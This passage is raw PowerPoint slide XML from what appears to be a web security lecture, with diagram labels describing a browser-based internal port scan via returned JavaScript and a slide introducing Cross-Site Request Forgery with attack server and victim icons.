                <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Request web page</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 20"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2297113" y="4008438"/>
            <a:ext cx="2976562" cy="709612"/>
            <a:chOff x="1506" y="2539"/>
            <a:chExt cx="1875" cy="447"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32796" name="Freeform 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1858" y="2539"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
                <a:gd name="T1" fmla="*/ 1907 h 176"/>
                <a:gd name="T2" fmla="*/ 626 w 1544"/>
                <a:gd name="T3" fmla="*/ 73 h 176"/>
                <a:gd name="T4" fmla="*/ 1274 w 1544"/>
                <a:gd name="T5" fmla="*/ 2378 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 1544"/>
                <a:gd name="T12" fmla="*/ 176 h 176"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="1544" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="176"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32797" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1506" y="2813"/>
              <a:ext cx="1018" cy="173"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Respond with JS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32780" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5599113" y="5064125"/>
            <a:ext cx="1100137" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32781" name="Picture 17" descr="cisco-520-225"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3570288" y="5483225"/>
            <a:ext cx="1425575" cy="792163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 39"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6953250" y="2551113"/>
            <a:ext cx="1855788" cy="1420812"/>
            <a:chOff x="4439" y="1621"/>
            <a:chExt cx="1169" cy="895"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32793" name="Picture 11" descr="CompaqAlphaServerES40"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4880" y="1621"/>
              <a:ext cx="728" cy="895"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32794" name="Line 21"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="4439" y="2054"/>
              <a:ext cx="320" cy="336"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32795" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4541" y="2204"/>
              <a:ext cx="278" cy="155"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 38"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6981825" y="4552950"/>
            <a:ext cx="1751013" cy="1436688"/>
            <a:chOff x="4457" y="2882"/>
            <a:chExt cx="1103" cy="905"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32790" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4655" y="2882"/>
              <a:ext cx="905" cy="905"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32791" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4504" y="3017"/>
              <a:ext cx="341" cy="283"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32792" name="Text Box 26"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4457" y="3152"/>
              <a:ext cx="278" cy="155"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 30"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4826000" y="5211763"/>
            <a:ext cx="666750" cy="384175"/>
            <a:chOff x="3048" y="3297"/>
            <a:chExt cx="473" cy="383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32788" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3048" y="3297"/>
              <a:ext cx="361" cy="351"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32789" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3208" y="3435"/>
              <a:ext cx="313" cy="245"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>scan</a:t>
              </a:r>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 34"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2146300" y="4891088"/>
            <a:ext cx="3173413" cy="593725"/>
            <a:chOff x="1411" y="3095"/>
            <a:chExt cx="1999" cy="374"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32786" name="Freeform 32"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="1887" y="3095"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
                <a:gd name="T1" fmla="*/ 1907 h 176"/>
                <a:gd name="T2" fmla="*/ 626 w 1544"/>
                <a:gd name="T3" fmla="*/ 73 h 176"/>
                <a:gd name="T4" fmla="*/ 1274 w 1544"/>
                <a:gd name="T5" fmla="*/ 2378 h 176"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1544"/>
                <a:gd name="T10" fmla="*/ 0 h 176"/>
                <a:gd name="T11" fmla="*/ 1544 w 1544"/>
                <a:gd name="T12" fmla="*/ 176 h 176"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="1544" h="176">
                  <a:moveTo>
                    <a:pt x="0" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="251" y="70"/>
                    <a:pt x="502" y="0"/>
                    <a:pt x="759" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1016" y="12"/>
                    <a:pt x="1280" y="94"/>
                    <a:pt x="1544" y="176"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32787" name="Text Box 33"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1411" y="3296"/>
              <a:ext cx="1245" cy="173"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3) port scan results</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Date Placeholder 31"/>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33" name="Slide Number Placeholder 32"/>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Footer Placeholder 33"/>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259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50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nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>(CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BA9CBF30-06CD-4DE8-A1E5-92ACF7ED862F}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54276" name="Picture 18" descr="toshiba_satellite_a105_s4284_laptop"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2874963"/>
            <a:ext cx="1436688" cy="1436687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54277" name="Picture 11" descr="CompaqAlphaServerES40"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5951538" y="1855788"/>
            <a:ext cx="1155700" cy="1420812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54278" name="Picture 4" descr="DS15serverfront"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="5173663"/>
            <a:ext cx="2436813" cy="846137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54279" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5713413" y="4792663"/>
            <a:ext cx="1693862" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54280" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5554663" y="1428750"/>
            <a:ext cx="1760537" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54281" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2427288" y="2257425"/>
            <a:ext cx="2830512" cy="617538"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="arrow" w="med" len="med"/>
            <a:tailEnd type="arrow" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54282" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4248150"/>
            <a:ext cx="1465263" cy="400050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54283" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2763838" y="2070100"/>
